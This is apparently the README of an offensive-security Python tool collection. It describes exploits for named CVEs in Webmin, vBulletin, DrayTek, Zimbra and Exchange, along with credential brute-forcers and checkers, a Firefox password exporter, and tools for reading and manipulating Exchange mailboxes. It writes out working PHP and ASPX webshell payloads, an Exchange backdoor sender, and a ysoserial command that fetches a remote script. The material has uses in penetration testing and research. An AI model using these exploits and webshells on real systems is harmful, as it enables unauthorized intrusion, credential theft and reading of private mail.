Homework-of-Python

Python codes of my blog.

pptp_password_hack.py

Uses a brute-force attack to get the password of a PPTP VPN.

It reads the passwords from a file named wordlist and then uses pptpsetup to connect to the server.

The interval between attempts is 10 seconds.


portscan.py

Used to scan ports.

The timeout is 3 seconds.

C++ version:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp


urltoip.py

Used to get the IP of a URL.

I can use the result of Sublist3r directly.

file_deduplication(For_urltoip).py

Used to remove duplicate IPs from the result of Sublist3r.

I can use the result of urltoip.py directly.

The IPs can be sorted with Sublime (F9).


file_deduplication.py

Used to remove duplicate items from a file.

Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py

Reference:

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html


fofa_api.py

Used to call FOFA's API and print the IPs from the results.

You can get 100 results.

fofa_api_VIP.py

Used to call FOFA's API and print the IPs from the results.

If you're a VIP, you'll get 10000 results.


vBulletin_5.x_0day_pre-auth_RCE.py

Reference:

https://seclists.org/fulldisclosure/2019/Sep/31

Eg.

echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

phpStudy_5.2-5.45_(php_xmlrpc.dll)_backdoor_RCE.py

Reference:

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

Eg.

system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

ExportFirefoxPassword.py

Used to export the passwords saved in Firefox.

get_Exchange_version.py

Used to get the version of Exchange.

First it gets the BuildNumber from the source code of the URL and then gets the version.

Reference:

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019


SMBv3_RCE_Scanner(CVE-2020-0796).py

Used to scan for the SMBv3 RCE vulnerability.

The timeout is 3 seconds.


Unauthenticated_RCE_in_Draytek_Vigor2960\3900\300B.py

Reference:

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI.

Affected Products:

  • Vigor300B <v1.5.1
  • Vigor2960 <v1.5.1
  • Vigor3900 <v1.5.1

Zimbra_SOAP_API_Manage.py

Uses the Zimbra SOAP API to connect to the Zimbra mail server.

Usage:

      Zimbra_SOAP_API.py <url> <username> <password> <mode>

mode:

  • low: auth for a low token
  • admin: auth for an admin token
  • ssrf: use CVE-2019-9621 to get the admin token

Eg:

      Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low

checkEWS.py

Used to check for valid accounts of Exchange Web Service (supports plaintext and ntlmhash).

Reference: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

Usage:

checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

Eg.

checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

checkAutodiscover.py

Used to access Autodiscover.xml and get the user's configuration (supports plaintext and ntlmhash).

Usage:

checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

Eg.

checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkautodiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6148a25fa1 getusersetting

checkAutodiscoverEx.py

Extra mode of checkAutodiscover.py; it adds a parameter.

ewsManage.py

Used to access Exchange Web Service (supports plaintext and ntlmhash).

Usage:

ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname


Eg.

ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

sshCheck.py

Used to check for valid SSH credentials (supports password and private key file).

Usage:

sshCheck.py <host> <port> <mode> <user> <password>
<mode>:
- plaintext
- keyfile

Eg.

sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

sshRunCmd.py

Remote command execution via SSH (supports password and private key file).

Usage:

sshRunCmd.py <host> <port> <mode> <user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If <cmd> is shell, you will get an interactive shell.

Eg.

sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

easCheck.py

Used to check for valid credentials of EAS (Exchange Server ActiveSync).

Usage:

easCheck.py <host> <user> <password>

Eg.

easCheck.py 192.168.1.1 user1 password1

checkOWA.py

Used to check for valid Exchange accounts by connecting to OWA.

Usage:

checkOWA.py <url> <user> <password>

owaManage.py

Used to read mails by connecting to OWA.

Usage:

owaManage.py <url> <user> <password> <command>
<command>:
- ListFolder
- ViewMail
- DownloadAttachment

imapManage.py

Uses IMAP to connect to the mail server.

Usage:

imapManage.py <IMAP server> <username> <password> <command>
<command>:
CheckConfig             get the folder names
SaveAttachOfInbox       save the attachments of Inbox
SaveAttachOfSent        save the attachments of Sent
DownloadAllMailOfInbox  download all the mails of Inbox
DownloadAllMailOfSent   download all the mails of Sent

Eg:

imapManage.py 192.168.1.1 user1 password CheckConfig

aspxCmdNTLM.py

Used to implement NTLM authentication and communicate with execCmd.aspx.

Communication data is encoded with Base64.

Usage:

aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash

Eg.

aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 whoami

SharpExchangeBackdoor.py

C# version: SharpExchangeBackdoor.cs

Used to send a payload to the Exchange webshell backdoor.

Support:

  • assemblyLoad
  • webshellWrite

Usage:

    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

eg.

    SharpExchangeBackdoor.py https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
    SharpExchangeBackdoor.py https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx

assemblyLoad.aspx:

<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>

webshellWrite.aspx:

<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>

Zimbra_deserialization_RCE(CVE-2019-6980).py

Insecure object deserialization - IMAP

Usage:

<url> <user> <password> <payload path>

Eg.

https://192.168.1.1 [email protected] password1 payload.obj

Note:

You can generate payload.obj like this:

java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget https://192.168.1.1/test.sh --no-check-certificate -O /tmp/test.sh" > payload.obj


ExchangeDeserializeShell-NoAuth-TextFormattingRunProperties.py

ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py

ExchangeDeserializeShell-NoAuth-ghostfile.py

Used to test deserialization code execution against Exchange.
From read and write permissions on Exchange files to deserialization code execution: you should modify the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy\web.config to implement deserialization code execution.

<path>: owa or ecp

Usage:

    <url> <key> <path>

eg.

 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
 mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp

Exchange_EWS_XML_Parser.py

Used to parse Exchange SOAP XML messages.


eacManage.py

Used to access the Exchange admin center.

Usage:

eacManage.py <url> <user> <password> <command>
<command>:
- ListAdminRoles
- NewAdminRoles
- EditAdminRoles
- DeleteAdminRoles
- AddMailbox
- RemoveMailbox
- ExportAllMailbox
- GetCertificate
- ExportCertificate

vSphereAutomationAPI_Manage.py

Uses the vSphere Automation API (v7.0U1+) to manage VMs.

Supports Windows and Linux VMs.

vSphereWebServicesAPI_Manage.py

Uses the vSphere Web Services API to manage VMs.

Reference: https://github.com/vmware/pyvmomi/

Install: pip install --upgrade pyvmomi

vCenterLDAP_Manage.py

Used to manage the LDAP database on vCenter.


SolarWindsOrion_Manage.py

Used to manage the SolarWinds Orion platform.

SolarWindsOrionAPI_Manage.py

Uses the SolarWinds Orion API to manage the Orion platform.


MailEnableManage.py

Used to manage the MailEnable mail server.


blind_XXEPlatform_CVE-2019-9670.py

It supports receiving results through the HTTP or FTP protocol.


ewsManage_Downloader.py

Used to access Exchange Web Service (supports plaintext and ntlmhash).

ewsManage_exchangelib_Downloader.py

Used to access Exchange Web Service (supports plaintext and ntlmhash).

ewsManage_requests_ntlm_Downloader.py

Uses requests_ntlm2 to access Exchange Web Service (supports plaintext and ntlmhash).

ewsManage_requests_ntlm_Session_Downloader.py

Uses requests_ntlm2 to access Exchange Web Service (supports plaintext and ntlmhash).

Uses a session to reduce communication data.


vCenter_ExtraCertFromMdb.py

Modified from https://github.com/horizon3ai/vcenter_saml_login

vCenter_GenerateLoginCookie.py

Modified from https://github.com/horizon3ai/vcenter_saml_login


Exchange_GetVersion_MatchVul.py

Used to get the version of Exchange and match it against existing vulnerabilities.

Exchange_GetVersion_ParseFromFile.py

Used to get the version of Exchange and parse the version from https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019

You should save https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 as exchange.data.

Exchange_GetVersion_ParseFromWebsite.py

Used to get the version of Exchange and parse the version from https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019


Exchange_GetInternalIP.py

Used to get the internal IP of Exchange.

Based on the msf module auxiliary/scanner/http/owa_iis_internal_ip, but supports more Exchange Servers.


vRealizeOperationsManager_GetVersion.py

Used to get the version of vRealize Operations Manager.


BIG-IP_RunBash.py

Uses bash to run commands.


SophosUTM_plxDecrypter.py

Used to decrypt the .plx files of Sophos UTM.

Reference:

https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

https://github.com/the6p4c/bfs_extract

SophosUTM_ConfigParser.py

Used to parse the config of Sophos UTM.

